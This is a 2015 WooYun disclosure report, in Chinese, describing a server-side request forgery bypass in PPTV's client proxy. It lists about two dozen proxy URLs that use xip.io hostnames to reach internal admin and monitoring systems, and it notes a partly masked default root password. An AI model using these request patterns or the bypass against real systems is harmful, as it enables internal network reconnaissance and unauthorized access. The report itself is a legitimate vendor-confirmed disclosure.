当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0103530
漏洞标题:
PPTV某处SSRF可探内网
相关厂商:
PPTV(PPlive)
漏洞作者:
lijiejie
提交时间:
2015-03-24 21:38
修复时间:
2015-05-09 09:54
公开时间:
2015-05-09 09:54
漏洞类型:
设计缺陷/逻辑错误
危害等级:
自评Rank:
6
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-25: 厂商已经确认,细节仅向厂商公开
2015-04-04: 细节向核心白帽子及相关领域专家公开
2015-04-14: 细节向普通白帽子公开
2015-04-24: 细节向实习白帽子公开
2015-05-09: 细节向公众公开

简要描述:

PPTV某处SSRF可探内网

详细说明:

WooYun: PPTV某处代理可探测pptv内网
漏洞修复不完整,可绕过,泄露内网HTTP服务和敏感信息。 参考链接: WooYun: 乌云多数已修复SSRF漏洞可被绕过

漏洞证明:

http://client.pptv.com/v3/proxy?s=http://10.208.4.23.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.20.35.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.30.41.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://sso-cas.pplive.cn/cas/login?service=
http://client.pptv.com/v3/proxy?s=http://10.208.188.47.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.250.50.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.10.53.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html  zabbix
http://client.pptv.com/v3/proxy?s=http://10.208.169.56.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.188.60.xip.io/sys_login.jsp?url=?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.101.72.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.188.74.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.188.76.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.189.95.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.189.100.xip.io//user/login?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.101.102.xip.io/allocateDB.php?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.20.105.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.187.116.xip.io/admin/?http://zt.pptv.com/clientzt/sports/ice/index.html   PPTV Shipyard   请用域用户名和密码登录
http://client.pptv.com/v3/proxy?s=http://10.208.168.147.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html          Ops Tools Team Protal
http://client.pptv.com/v3/proxy?s=http://10.208.10.167.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html        Foreman 
http://client.pptv.com/v3/proxy?s=http://10.208.168.171.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html        PPTV字幕管理系统
http://client.pptv.com/v3/proxy?s=http://10.208.168.171.xip.io//subtitle/index?http://zt.pptv.com/clientzt/sports/ice/index.html
http://client.pptv.com/v3/proxy?s=http://10.208.189.204.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html  Log Server
http://client.pptv.com/v3/proxy?s=http://10.208.187.228.xip.io/top10?http://zt.pptv.com/clientzt/sports/ice/index.html  Django
http://client.pptv.com/v3/proxy?s=http://10.208.189.228.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html  Django
http://client.pptv.com/v3/proxy?s=http://10.208.10.232.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html   编码


未授权访问后台:

pptv_subtitle.jpg

pptv_ops.jpg


pptv_pplive.jpg


通过目录浏览,可获取少量敏感信息,例如root默认口令。 pw=zMjs****_cd_pp**

修复方案:

严格限定可代理的目标

版权声明:转载请注明来源 lijiejie@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-25 09:53

厂商回复:

感谢反馈,处理中

最新状态:

暂无